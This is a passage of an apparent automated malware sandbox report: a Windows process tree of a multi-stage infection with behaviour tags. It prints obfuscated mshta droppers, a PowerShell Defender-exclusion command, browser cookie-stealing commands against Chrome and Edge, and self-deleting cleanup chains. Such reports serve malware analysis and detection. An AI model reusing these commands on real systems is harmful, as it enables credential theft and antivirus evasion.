                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:4592
                                                                                                                                                                                                        • C:\Users\Admin\Documents\1w6fC4HbQiyU7fj9_0Xtn44W.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\1w6fC4HbQiyU7fj9_0Xtn44W.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          PID:5688
                                                                                                                                                                                                          • C:\Users\Admin\Documents\1w6fC4HbQiyU7fj9_0Xtn44W.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\1w6fC4HbQiyU7fj9_0Xtn44W.exe"
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                            PID:7444
                                                                                                                                                                                                        • C:\Users\Admin\Documents\GSwc_ykjVJo3SzYNn0ZdgsbU.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\GSwc_ykjVJo3SzYNn0ZdgsbU.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          PID:4184
                                                                                                                                                                                                          • C:\Users\Admin\Documents\GSwc_ykjVJo3SzYNn0ZdgsbU.exe
                                                                                                                                                                                                            C:\Users\Admin\Documents\GSwc_ykjVJo3SzYNn0ZdgsbU.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:7952
                                                                                                                                                                                                          • C:\Users\Admin\Documents\lmM06OL6dfl0npXNhCXMEw0Z.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\lmM06OL6dfl0npXNhCXMEw0Z.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:7184
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "lmM06OL6dfl0npXNhCXMEw0Z.exe" /f & erase "C:\Users\Admin\Documents\lmM06OL6dfl0npXNhCXMEw0Z.exe" & exit
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:2868
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill /im "lmM06OL6dfl0npXNhCXMEw0Z.exe" /f
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                              • C:\Users\Admin\Documents\SEdJgtoIRcpeKv9RPveqa8Vl.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\SEdJgtoIRcpeKv9RPveqa8Vl.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                PID:7176
                                                                                                                                                                                                              • C:\Users\Admin\Documents\ePZxlZGGDlJEX258eyTvvIJg.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\ePZxlZGGDlJEX258eyTvvIJg.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                PID:6544
                                                                                                                                                                                                              • C:\Users\Admin\Documents\LZE_qJ_4JO_r1OEYrhs2j4bu.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\LZE_qJ_4JO_r1OEYrhs2j4bu.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                                • C:\Users\Admin\Documents\LZE_qJ_4JO_r1OEYrhs2j4bu.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\LZE_qJ_4JO_r1OEYrhs2j4bu.exe"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:8180
                                                                                                                                                                                                                • C:\Users\Admin\Documents\dnI0Nyr1dhdT0WX97gG1c7nM.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\dnI0Nyr1dhdT0WX97gG1c7nM.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:4904
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\dnI0Nyr1dhdT0WX97gG1c7nM.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\dnI0Nyr1dhdT0WX97gG1c7nM.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\dnI0Nyr1dhdT0WX97gG1c7nM.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\dnI0Nyr1dhdT0WX97gG1c7nM.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:4452
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                                                            WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5140
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:8900
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:5960
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  PID:5516
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill -IM "dnI0Nyr1dhdT0WX97gG1c7nM.exe" -f
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:7916
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\ph9NlVz7Qvf1_CMPUlzoHziR.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\ph9NlVz7Qvf1_CMPUlzoHziR.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:5044
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 268
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              PID:7216
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\U8LvshfYJCTvpGJbQieIaIFW.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\U8LvshfYJCTvpGJbQieIaIFW.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                            PID:7632
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im U8LvshfYJCTvpGJbQieIaIFW.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\U8LvshfYJCTvpGJbQieIaIFW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:7128
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  taskkill /im U8LvshfYJCTvpGJbQieIaIFW.exe /f
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:4288
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:10188
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\lEfgDAeWkrEBqHCFqCRSfsY2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\lEfgDAeWkrEBqHCFqCRSfsY2.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:7624
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\dfSfPIf2SJZT3hqKxrTNnY2T.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\dfSfPIf2SJZT3hqKxrTNnY2T.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:7616
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\dfSfPIf2SJZT3hqKxrTNnY2T.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\dfSfPIf2SJZT3hqKxrTNnY2T.exe" -q
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:5804
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\ZFktufUPXya0NOE5XLXNLi5e.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\ZFktufUPXya0NOE5XLXNLi5e.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    PID:8148
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\KculPoNN92PoPr7GhMQK3R7B.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\KculPoNN92PoPr7GhMQK3R7B.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:1108
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-JARRS.tmp\KculPoNN92PoPr7GhMQK3R7B.tmp
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-JARRS.tmp\KculPoNN92PoPr7GhMQK3R7B.tmp" /SL5="$40246,138429,56832,C:\Users\Admin\Documents\KculPoNN92PoPr7GhMQK3R7B.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:7816
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-BFF30.tmp\Setup.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-BFF30.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                            PID:6272
                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                                                                              PID:8860
                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:3268
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:7852
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5972
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5936
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\v0lGWcBLiIlL65XeoDaF3bGa.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\v0lGWcBLiIlL65XeoDaF3bGa.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:4656
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\V0LGWC~1.DLL,s C:\Users\Admin\DOCUME~1\V0LGWC~1.EXE
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      PID:7544
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\V0LGWC~1.DLL,Xzol
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                        PID:7860
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\V0LGWC~1.DLL
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:8532
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\V0LGWC~1.DLL,j1U5dXFhMkNO
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:7764
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6708
                                                                                                                                                                                                                                                • C:\Windows\system32\ctfmon.exe
                                                                                                                                                                                                                                                  ctfmon.exe
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:8104
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp3939.tmp.ps1"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:4580
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\RBrmwmnNtttFzhDckUsrM15K.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\RBrmwmnNtttFzhDckUsrM15K.exe"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4648
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\RBrmwmnNtttFzhDckUsrM15K.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\RBrmwmnNtttFzhDckUsrM15K.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4576
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\RBrmwmnNtttFzhDckUsrM15K.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\RBrmwmnNtttFzhDckUsrM15K.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                    PID:2080
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                                                                                      WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5472
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:6152
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:7004
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:6616
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          taskkill -IM "RBrmwmnNtttFzhDckUsrM15K.exe" -f
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:5556
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\e7cwnPJFoL5bFAb0CSHwkPdo.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\e7cwnPJFoL5bFAb0CSHwkPdo.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:4604
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 660
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:4668
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 700
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 744
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:4496
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 632
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:1060
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 1076
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:2864
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\uNcxHy_GVJExuh8dT86zk160.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\uNcxHy_GVJExuh8dT86zk160.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:4540
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:2088
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:3424
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5952
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:5000
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                                                      PID:4164
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5208
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5984
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5532
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5680
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:6472
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:6532
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
